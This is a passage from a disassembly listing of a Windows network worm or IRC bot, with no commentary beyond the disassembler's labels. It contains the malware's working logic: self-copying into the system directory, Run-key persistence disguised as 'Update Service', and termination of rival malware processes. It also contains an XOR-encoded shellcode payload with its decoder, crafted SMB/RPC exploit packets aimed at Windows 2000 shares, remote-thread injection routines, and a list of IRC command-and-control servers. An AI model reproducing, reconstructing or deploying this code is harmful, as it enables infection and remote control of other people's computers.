add esp, 18h
cmp esi, 100007Fh
jz short loc_313032FF
push esi
push offset sub_313030B2
call sub_31302AC4
pop ecx
pop ecx
loc_313032FF: ; CODE XREF: sub_31303256+9A�j
; sub_31303256+B7�j
push esi
push offset sub_31303112
call sub_31302AC4
pop ecx
dec edi
pop ecx
jnz short loc_313032FF
test ebx, ebx
pop edi
jle short loc_31303327
mov esi, ebx
loc_31303316: ; CODE XREF: sub_31303256+CF�j
push 0
push offset sub_31303196
call sub_31302AC4
pop ecx
dec esi
pop ecx
jnz short loc_31303316
loc_31303327: ; CODE XREF: sub_31303256+BC�j
push 0FFFFFFFFh
call dword_313010D0 ; Sleep
pop esi
xor eax, eax
pop ebx
leave
retn
sub_31303256 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303335 proc near ; CODE XREF: sub_313034CE+85�p
; sub_31303641+B5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3130100C ; RegOpenKeyExA
test eax, eax
jnz short loc_31303368
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31301010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31301014 ; RegCloseKey
loc_31303368: ; CODE XREF: sub_31303335+1C�j
pop ebp
retn
sub_31303335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3130336A proc near ; CODE XREF: sub_31302C49+33�p
; sub_313034CE+76�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3130100C ; RegOpenKeyExA
test eax, eax
jz short loc_31303396
push 1
pop eax
jmp short loc_313033C0
; ---------------------------------------------------------------------------
loc_31303396: ; CODE XREF: sub_3130336A+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31301008 ; RegQueryValueExA
test eax, eax
jz short loc_313033B5
push 2
pop esi
loc_313033B5: ; CODE XREF: sub_3130336A+46�j
push [ebp+arg_10]
call dword_31301014 ; RegCloseKey
mov eax, esi
loc_313033C0: ; CODE XREF: sub_3130336A+2A�j
pop esi
leave
retn
sub_3130336A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313033C3 proc near ; CODE XREF: sub_31303575+96�p
; sub_31303641+60�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31301000 ; RegCreateKeyExA
test eax, eax
jz short loc_313033EC
push 1
pop eax
jmp short loc_31303413
; ---------------------------------------------------------------------------
loc_313033EC: ; CODE XREF: sub_313033C3+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31301004 ; RegSetValueExA
test eax, eax
jz short loc_31303408
push 2
pop esi
loc_31303408: ; CODE XREF: sub_313033C3+40�j
push [ebp+arg_4]
call dword_31301014 ; RegCloseKey
mov eax, esi
loc_31303413: ; CODE XREF: sub_313033C3+27�j
pop esi
pop ebp
retn
sub_313033C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303416 proc near ; CODE XREF: sub_313034CE+91�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_313010CC ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_313034CA
loc_31303436: ; CODE XREF: sub_31303416+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_3130343F
dec esi
jns short loc_31303436
loc_3130343F: ; CODE XREF: sub_31303416+24�j
push 0
push 2
call sub_313037AE ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_313034CA
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31303744 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_313037A8 ; Process32First
test eax, eax
jz short loc_313034CA
lea esi, [esi+ebx+1]
loc_31303487: ; CODE XREF: sub_31303416+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_3130110C ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_313034B7
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_313010E4 ; OpenProcess
push 0
push eax
call dword_31301060 ; TerminateProcess
loc_313034B7: ; CODE XREF: sub_31303416+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_313037A2 ; Process32Next
test eax, eax
jnz short loc_31303487
loc_313034CA: ; CODE XREF: sub_31303416+1A�j
; sub_31303416+38�j ...
pop esi
pop ebx
leave
retn
sub_31303416 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313034CE proc near ; CODE XREF: UPX0:31302E00�p
var_134 = byte ptr -134h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push ebx
push esi
lea eax, [ebp+var_2C]
push edi
mov [ebp+var_2C], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_28], offset aSystemServiceM ; "System Service Manager"
mov [ebp+var_24], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_20], offset aBotLoader ; "Bot Loader"
mov [ebp+var_1C], offset aSystray ; "SysTray"
mov [ebp+var_18], offset aWinupdate ; "WinUpdate"
mov [ebp+var_14], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_10], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_C], offset aAvserve2_exe ; "avserve2.exe"
mov [ebp+var_4], eax
mov [ebp+var_8], 9
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31303530: ; CODE XREF: sub_313034CE+A0�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_134]
push eax
push ebx
push edi
push esi
call sub_3130336A
add esp, 14h
test eax, eax
jnz short loc_31303567
push ebx
push edi
push esi
call sub_31303335
lea eax, [ebp+var_134]
push eax
call sub_31303416
add esp, 10h
loc_31303567: ; CODE XREF: sub_313034CE+80�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31303530
pop edi
pop esi
pop ebx
leave
retn
sub_313034CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303575 proc near ; CODE XREF: sub_31303641+6A�p
; sub_31303641+CA�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3130358A
push [ebp+arg_0]
call dword_3130106C ; DeleteFileA
loc_3130358A: ; CODE XREF: sub_31303575+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_313010B4 ; GetSystemDirectoryA
test eax, eax
jz locret_3130363F
push esi
call dword_31301120 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31302AE5
mov esi, dword_313010EC
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset asc_31304DDC ; "\\"
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31301050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_313010CC ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aUpdateService ; "Update Service"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_313033C3
add esp, 14h
push dword_31304FD0
call dword_313010A0 ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31301054 ; WinExec
push 1F4h
call dword_313010D0 ; Sleep
push 0
call dword_31301070 ; ExitProcess
pop esi
locret_3130363F: ; CODE XREF: sub_31303575+23�j
leave
retn
sub_31303575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31303641 proc near ; CODE XREF: UPX0:31302E05�p
var_DC = byte ptr -0DCh
var_78 = byte ptr -78h
var_14 = byte ptr -14h
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
push edi
lea eax, [ebp+var_78]
push 63h
xor edi, edi
push eax
push edi
call dword_31301048 ; GetModuleFileNameA
test eax, eax
jz loc_31303712
lea eax, [ebp+var_DC]
push 63h
push eax
push offset aUpdateService ; "Update Service"
mov esi, 80000002h
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
mov ds:dword_31305008, edi
call sub_3130336A
add esp, 14h
test eax, eax
jz short loc_313036B5
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push esi
call sub_313033C3
lea eax, [ebp+var_78]
push eax
push edi
call sub_31303575
add esp, 1Ch
jmp short loc_31303712
; ---------------------------------------------------------------------------
loc_313036B5: ; CODE XREF: sub_31303641+4C�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call dword_3130104C ; lstrcmpi
test eax, eax
jnz short loc_31303700
lea eax, [ebp+var_14]
push 14h
mov ebx, offset aClient ; "Client"
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push ebx
push edi
push esi
call sub_3130336A
add esp, 14h
test eax, eax
jnz short loc_31303712
push ebx
push edi
push esi
mov ds:dword_31305008, 1
call sub_31303335
add esp, 0Ch
jmp short loc_31303712
; ---------------------------------------------------------------------------
loc_31303700: ; CODE XREF: sub_31303641+87�j
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_DC]
push eax
call sub_31303575
pop ecx
pop ecx
loc_31303712: ; CODE XREF: sub_31303641+1D�j
; sub_31303641+72�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31303641 endp
; =============== S U B R O U T I N E =======================================
sub_31303717 proc near ; CODE XREF: sub_31301228+2A�p
; sub_313014C6+27�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31301044 ; VirtualAlloc
retn
sub_31303717 endp
; =============== S U B R O U T I N E =======================================
sub_3130372B proc near ; CODE XREF: sub_31301228+EB�p
; sub_313014C6+75�p ...
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31301040 ; VirtualFree
retn
sub_3130372B endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130373E proc near ; CODE XREF: sub_31301228+4B�p
; sub_31301631+93�p ...
jmp dword_3130111C
sub_3130373E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303744 proc near ; CODE XREF: sub_31301562+20�p
; sub_31301631+128�p ...
jmp dword_31301118
sub_31303744 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130374A proc near ; CODE XREF: sub_31301631+9C�p
; sub_31301631+C5�p ...
jmp dword_31301114
sub_3130374A endp
; =============== S U B R O U T I N E =======================================
sub_31303750 proc near ; CODE XREF: sub_31301631+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31303770
loc_3130375C: ; CODE XREF: sub_31303750+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_3130375C
loc_31303770: ; CODE XREF: sub_31303750+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31303750 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_313037B4
loc_31303780: ; CODE XREF: sub_313037B4+5�j
; UPX0:313037D0�j
jmp dword ptr locret_31301106+2
; END OF FUNCTION CHUNK FOR sub_313037B4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303790 proc near ; CODE XREF: sub_31302260+5�p
; UPX0:31302437�p
jmp dword ptr loc_31301104
sub_31303790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31303796 proc near ; CODE XREF: sub_31302F59+10C�p
; sub_31302F59+119�p ...
jmp dword_313010F8
sub_31303796 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_3130379C proc near ; CODE XREF: sub_31302F59+35�p
jmp dword_313010F4
sub_3130379C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037A2 proc near ; CODE XREF: sub_31303416+AB�p
jmp dword_31301064
sub_313037A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037A8 proc near ; CODE XREF: sub_31303416+64�p
jmp dword_3130105C
sub_313037A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_313037AE proc near ; CODE XREF: sub_31303416+2D�p
jmp dword_31301058
sub_313037AE endp
; =============== S U B R O U T I N E =======================================
sub_313037B4 proc near ; DATA XREF: sub_31302260�o
; FUNCTION CHUNK AT 31303780 SIZE 00000006 BYTES
mov eax, offset dword_313037D8
jmp loc_31303780
sub_313037B4 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-1F0h]
jmp loc_31301E48
; ---------------------------------------------------------------------------
loc_313037CB: ; DATA XREF: UPX0:loc_31302432�o
mov eax, offset dword_31303830
jmp loc_31303780
; ---------------------------------------------------------------------------
align 4
dword_313037D8 dd 19930520h, 2, 313037F8h, 1, 31303808h, 3 dup(0)
; DATA XREF: sub_313037B4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31303820h, 4 dup(0)
dd offset loc_31302343
dword_31303830 dd 19930520h, 1, 31303850h, 5 dup(0) ; DATA XREF: UPX0:loc_313037CB�o
dd 0FFFFFFFFh, 313037C0h, 1EAh dup(0)
dword_31304000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_313011B9+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_313011A0+3�o
align 10h
loc_31304120: ; DATA XREF: sub_31301631+24E�o
; sub_31301631+260�o ...
jmp short loc_31304149
; ---------------------------------------------------------------------------
loc_31304122: ; DATA XREF: sub_31303256+6B�o
adc dh, [esi]
loc_31304124: ; DATA XREF: sub_31303256+87�o
aad 0AAh
stosb
stosd
loc_31304128: ; CODE XREF: UPX0:loc_31304149�p
pop ebp
xor ecx, ecx
mov cx, 225h
lea esi, [ebp+5]
mov edi, esi
loc_31304134: ; CODE XREF: UPX0:31304145�j
mov al, [esi]
cmp al, 99h
jnz short loc_3130413F
inc esi
mov al, [esi]
sub al, 30h
loc_3130413F: ; CODE XREF: UPX0:31304138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_31304134
jmp short near ptr loc_31304152+1
; ---------------------------------------------------------------------------
loc_31304149: ; CODE XREF: UPX0:loc_31304120�j
call loc_31304128
bound esp, cs:[ebp+67h]
loc_31304152: ; CODE XREF: UPX0:31304147�j
db 2Eh
jno short near ptr dword_31304000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F68E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D271C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AF71h, 0F3C999C9h
dd 1065E368h, 99981D1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981D2Ch
dd 71C999C9h, 99C9996Fh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6571C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E5h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Dh, 2E71C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1D2C669Bh, 99C99998h, 993C71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0F60414D9h, 99C99998h, 2971CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F2h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E52C66h, 0C999C999h, 98F22C66h, 0C999C999h
dd 0C9991171h, 0C999C999h, 96A6485Ah, 0F22C66C0h, 99C99998h
dd 99E171C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998F604h
dd 0CAC999C9h, 0C999FF71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C2h, 0F9C999C9h, 0ECEF133Bh, 99C999A0h, 99C999C9h
dd 0B7C999C9h, 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 1E662A2Dh, 0E7E6ACC9h, 9CC9A5B7h, 829DB8BDh
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98191C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_313043FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_31301631+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31304488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_31304534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31304614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_31301631+BF�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_31304678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_313046E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31304788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_31304808 dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_31301631+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_3130489C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31304908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_31301631+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_3130497C dd 0 ; DATA XREF: sub_31301631+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_31304A40 dd 1004600h ; DATA XREF: sub_31301631+289�r
dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_31304A7C dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Bh dup(0)
; DATA XREF: sub_31301631+41B�o
; sub_31301631+45D�o
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_31304AF8: ; DATA XREF: sub_31301631+44A�o
jmp short loc_31304B00
; ---------------------------------------------------------------------------
jmp short loc_31304B02
; ---------------------------------------------------------------------------
align 10h
loc_31304B00: ; CODE XREF: UPX0:loc_31304AF8�j
; DATA XREF: sub_31301631+5C�o
pop esp
pop esp
loc_31304B02: ; CODE XREF: UPX0:31304AFA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_31304B0C dd 1CEC8166h ; DATA XREF: sub_31301631+D�r
dword_31304B10 dd 0E4FF07h ; DATA XREF: sub_31301631+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31301B98+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31301B98+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31301B98+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31301B98+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31301B98+8�o
align 4
aUterm_9 db 'uterm_9',0 ; DATA XREF: sub_31301C20:loc_31301D05�o
; UPX0:31302DD6�o ...
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_31301C20+58�o
align 10h
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_31301C20:loc_31301C67�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_31301C20+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_31301C20+18�o
align 10h
off_31304BC0 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:313024FA�r
; UPX0:3130254D�r
; "moscow-advokat.ru"
dd offset aGazProm_ru ; "gaz-prom.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_31304BF4
dword_31304BF4 dd 2E637269h, 2E72616Bh, 74656Eh ; DATA XREF: UPX0:31304BF0�o
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31304BEC�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31304BE8�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:31304BE4�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31304BE0�o
align 10h
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31304BDC�o
align 10h
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31304BD8�o
align 10h
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31304BD4�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31304BD0�o
